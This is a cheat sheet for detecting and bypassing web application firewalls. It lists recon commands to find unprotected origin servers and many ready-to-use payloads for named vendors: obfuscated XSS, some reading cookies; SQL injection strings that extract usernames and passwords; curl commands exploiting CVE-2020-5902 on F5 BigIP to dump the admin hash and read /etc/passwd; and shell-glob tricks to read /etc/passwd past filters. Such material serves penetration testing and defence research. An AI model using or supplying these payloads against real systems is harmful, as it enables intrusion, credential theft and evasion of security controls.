WAFs

Tools

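# --- WAF detection ---
# Both tools fingerprint the WAF/CDN from response headers, cookies and block pages.
whatwaf https://example.com
wafw00f https://example.com

# --- Origin-IP discovery (bypass the WAF entirely instead of its rules) ---
# https://github.com/vincentcox/bypass-firewalls-by-DNS-history
# Pulls historical A records and checks whether an old IP still serves the site directly.
bash bypass-firewalls-by-DNS-history.sh -d example.com

# Domain IP history (manual)
https://viewdns.info/iphistory/?domain=example.com
# A candidate origin is only useful if it still answers for the vhost; confirm before relying on it:
#   curl -sk -o /dev/null -w '%{http_code}\n' -H 'Host: example.com' https://<candidate-ip>/
# If the origin is reachable directly, none of the payload bypasses below are needed.

# Bypasser / WAF fuzzer
# https://github.com/RedSection/pFuzz

# Bypasses and info
https://github.com/0xInfection/Awesome-WAF
https://github.com/waf-bypass-maker/waf-community-bypasses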
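# Manual identification
dig +short target.com
# ipinfo.io exposes the owning network/ASN in the "org" field; there is no "com" field (the original '.com' printed null)
curl -s https://ipinfo.io/<ip address> | jq -r '.org'

# Always check DNS history for an original-IP leak.
# A WAF/CDN only inspects traffic that goes through it; an origin that is reachable
# directly (or that accepts the Host header for the site) bypasses every rule below.
https://whoisrequest.com/history/
https://viewdns.info/iphistory/?domain=target.com
# Confirm a candidate origin actually serves the vhost, not just that it is alive:
curl -sk -o /dev/null -w '%{http_code}\n' -H 'Host: target.com' https://<candidate-ip>/

# WAF detection
nmap --script=http-waf-fingerprint victim.com
nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 victim.com
# aggro mode sends attack-looking probes: noisy, will be logged and may get the source IP blocked
nmap -p80,443 --script http-waf-detect --script-args="http-waf-detect.aggro" victim.com
wafw00f victim.com

# Good bypass payloads
# Newline (%0A) between every character of "javascript": defeats filters that match the keyword contiguously;
# browsers strip the newlines when parsing the URL scheme.
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
# XSS polyglot (0xsobky). The rendered page had its middle elided ("→") and its quotes converted to
# typographic quotes, which breaks it; restored to the known ASCII form. The &lt; is intentional.
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

# Bypass by reaching hosts that are not proxied through the WAF (dev/staging often are not):
dev.domain.com
stage.domain.com
ww1.domain.com / ww2.domain.com / ww3.domain.com ...
www.domain.uk/jp/      # other ccTLDs / regional sites that share the same backend

# Akamai
# Origin hostnames commonly follow these patterns and are sometimes resolvable/reachable without the edge:
origin.sub.domain.com
origin-sub.domain.com
# - Send header: Akamai debug pragma. When honoured, the response includes an X-True-Cache-Key header
#   whose cache key contains the origin hostname/path Akamai used for the object.
Pragma: akamai-x-get-true-cache-key
# Payloads reported to pass Akamai (client-side template sandbox escape, JS string break-out, SQLi with comment-as-whitespace):
{{constructor.constructor(alert`1`)()}}
\');confirm(1);//
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#

# ModSecurity Bypass
# Duplicate attribute: per the HTML spec the browser keeps the first onerror and drops the rest; the repetition is
# only there to confuse the filter's parser.
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>

# Cloudflare
# CloudFlair: searches certificate-transparency/host data for servers presenting the site's cert outside Cloudflare
# (needs Censys API credentials)
python3 cloudflair.py domain.com
# https://github.com/mandatoryprogrammer/cloudflare_enum
cloudflare_enum.py disney.com
https://viewdns.info/iphistory/?domain=domain.com
https://whoisrequest.com/history/

# Cloudflare bypasses
<!<script>alert(1)</script>
# HTML entities (&Tab; &NewLine; &colon; &lpar; ...) and \u escapes are decoded by the browser, not by the WAF
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert'1';>
# NOTE: the rendered page had mangled every "a@b" token in the next line into "[email protected]"
# (site e-mail obfuscation); the original payload is restored here.
<select><noembed></select><script x='a@b'a>y='a@b'//a@b%0a\u0061lert(1)</script x>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

# Aqtronix WebKnight WAF
# - SQLi (parentheses instead of spaces)
0 union(select 1,@@hostname,@@datadir)
0 union(select 1,username,password from(users))
# - XSS (less common event handlers)
<details ontoggle=alert(document.cookie)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

# ModSecurity
# - XSS
<scr%00ipt>alert(document.cookie)</scr%00ipt>
onmouseover%0B=
ontoggle%0B%3D
# Multi-layer URL-encoded "on" prefix; only works if the target decodes the attribute name more than once — confirm per app
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert("123")>
# - SQLi (vertical tab inside keywords)
1+uni%0Bon+se%0Blect+1,2,3

# Imperva Incapsula
https://medium.com/@0xpegg/imperva-waf-bypass-96360189c3c5
# jjencode-style obfuscated handler (p=~[]; p={___:++p,...}); must be sent as ONE line — the rendered page wrapped it
url.com/search?search=%3E%3C/span%3E%3Cp%20onmouseover=%27p%3D%7E%5B%5D%3Bp%3D%7B%5F%5F%5F%3A%2B%2Bp%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%5F%24%3A%2B%2Bp%2C%24%5F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%24%5F%3A%2B%2Bp%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%24%3A%28p%5Bp%5D%2B%22%22%29%5Bp%5D%2C%5F%24%24%3A%2B%2Bp%2C%24%24%24%5F%3A%28%21%22%22%2B%22%22%29%5Bp%5D%2C%24%5F%5F%3A%2B%2Bp%2C%24%5F%24%3A%2B%2Bp%2C%24%24%5F%5F%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%3A%2B%2Bp%2C%24%24%24%3A%2B%2Bp%2C%24%5F%5F%5F%3A%2B%2Bp%2C%24%5F%5F%24%3A%2B%2Bp%7D%3Bp%2E%24%5F%3D%28p%2E%24%5F%3Dp%2B%22%22%29%5Bp%2E%24%5F%24%5D%2B%28p%2E%5F%24%3Dp%2E%24%5F%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%24%24%3D%28p%2E%24%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28%28%21p%29%2B%22%22%29%5Bp%2E%5F%24%24%5D%2B%28p%2E%5F%5F%3Dp%2E%24%5F%5Bp%2E%24%24%5F%5D%29%2B%28p%2E%24%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%5F%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%5F%5D%29%2Bp%2E%24%5F%5Bp%2E%24%5F%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%24%2Bp%2E%24%3Bp%2E%24%24%3Dp%2E%24%2B%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%2Bp%2E%24%2Bp%2E%24%24%3Bp%2E%24%3D%28p%2E%5F%5F%5F%29%5Bp%2E%24%5F%5D%5Bp%2E%24%5F%5D%3Bp%2E%24%28p%2E%24%28p%2E%24%24%2B%22%5C%22%22%2Bp%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%24%24%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2Bp%2E%5F%5F%2B%22%28%5C%5C%5C%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%5F%2Bp%2E%24%24%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%5F%24%2B%22%2C%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%24%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%5F%24%24%2Bp%2E%24%24%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%5F%24%2Bp%2E%5F%5F%24%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%5F%5F%2Bp%2E%5F%5F%2B%22%5C%5C%5C%22%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3B%27%3E
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
# - Parameter pollution SQLi
# Classic ASP/IIS joins duplicate query parameters with ", ", so the comment-wrapped fragments are
# reassembled into one statement server-side while each individual value looks harmless to the WAF.
http://www.website.com/page.asp?a=nothing'/*&a=*/or/*&a=*/1=1/*&a=*/--+-
http://www.website.com/page.asp?a=nothing'/*&a%00=*/or/*&a=*/1=1/*&a%00=*/--+-
# - XSS (double-encoded: %2526%2523x28 -> &#x28; after two decodes)
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<img/src="x"/onerror="[7 char payload goes here]">

# FAIL2BAN SQLi
# MySQL error-based payload: COUNT(*)+GROUP BY on FLOOR(RAND(0)*2) forces a duplicate-key error that carries the
# result; 0x7176706b71 / 0x717a717671 are the sqlmap-style delimiters used to find it in the error text.
(SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

# F5 BigIP
# TMUI path traversal through the "..;" segment (the 2020 TMUI RCE, CVE-2020-5902); only works on unpatched
# appliances. -k disables TLS verification because the management interface usually has a self-signed cert.
# RCE (runs a tmsh command; this one dumps the admin account, including its password hash):
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
# Read file:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
# - XSS (event handlers that need user interaction: scroll / right-click)
<body style="height:1000px" onwheel=alert("123")>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow=alert("123")>
<body style="height:1000px" onwheel="[JS-F**k Payload]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
# JSFuck payload, one line (the rendered page wrapped it). CAVEAT: this expression only *builds* the string
# "alert(1)"; placed in a handler as-is nothing executes. To run it, hand it to the Function constructor,
# e.g. []["filter"]["constructor"](<expr>)() — or use a full JSFuck encoding that already does so.
(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]
# Double-URL-encoded entity: %25%32%33%25%32%36x70; -> %23%26x70; -> &#x70; -> "p", i.e. prompt(1) after the browser decodes it
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">

# More payloads
https://github.com/Walidhossain010/WAF-bypass-xss-payloads

# Wordfence
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>

# RCE WAF globbing bypass
# The request never contains "cat" or "/etc/passwd"; the shell expands the ? globs and $IFS (default
# whitespace) at execution time. Check the expansion on a known box first: /???/???/c?t also matches
# e.g. /usr/bin/cut, and multiple matches become extra arguments.
# /usr/bin/cat /etc/passwd  is equivalent to:
/???/???/c?t$IFS/???/p?s?w?
# $u is an unset variable and expands to nothing; it just splits the literal "/etc/passwd"
cat /etc$u/p*s*wd$u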